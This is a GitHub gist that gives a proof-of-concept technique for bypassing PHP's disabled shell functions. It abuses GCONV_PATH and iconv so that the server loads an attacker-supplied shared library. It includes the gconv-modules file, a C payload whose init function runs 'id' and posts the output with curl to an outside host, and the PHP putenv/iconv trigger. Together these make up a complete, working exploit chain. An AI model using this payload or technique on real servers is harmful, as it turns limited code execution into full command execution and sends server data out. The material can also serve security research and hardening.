Skip to content

Instantly share code, notes, and snippets.

@LoadLow
Last active August 14, 2023 13:55
Show Gist options
  • Save LoadLow/90b60bd5535d6c3927bb24d5f9955b80 to your computer and use it in GitHub Desktop.
Save LoadLow/90b60bd5535d6c3927bb24d5f9955b80 to your computer and use it in GitHub Desktop.
Bypass shell_exec or system disabled functions by using GCONV (PHP rce to system())

This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/

Credits: @hugeh0ge

It uses iconv, in php, in order to execute the same payload.

Uses cases :

  • You control the first parameter of iconv (in_charset), you can set an env var and you can upload arbitrary files (.so library file and the gconv-modules file) and you know their path.
  • You have a php RCE but system, shell_exec, curl_exec and other functions are disabled but you can setenv (and LD_PRELOAD is blacklisted).

In this example, the files gconv-modules and payload.so are stored in /tmp.

  1. Compile the payload library.
gcc payload.c -o payload.so -shared -fPIC
  1. Upload / write the files gconv-modules and payload.so on the server.

  2. Trigger the php code stored on the server

curl https://mysuperserver.com/poc.php
module PAYLOAD// INTERNAL ../../../../../../../../tmp/payload 2
module INTERNAL PAYLOAD// ../../../../../../../../tmp/payload 2
#include <stdio.h>
#include <stdlib.h>
void gconv() {}
void gconv_init() {
puts("pwned");
system("id=`id`;curl http://foo.bar --data \"$id\"");
exit(0);
}
putenv("GCONV_PATH=/tmp");
iconv("payload", "UTF-8", "whatever");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment